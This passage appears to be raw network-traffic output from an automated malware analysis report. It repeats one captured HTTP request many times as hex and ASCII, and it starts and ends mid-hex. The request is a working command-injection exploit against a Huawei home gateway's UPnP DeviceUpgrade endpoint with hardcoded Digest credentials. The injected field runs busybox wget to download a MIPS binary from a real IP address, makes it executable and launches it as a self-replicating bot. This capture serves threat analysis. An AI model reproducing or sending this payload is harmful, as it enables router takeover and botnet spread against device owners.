72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 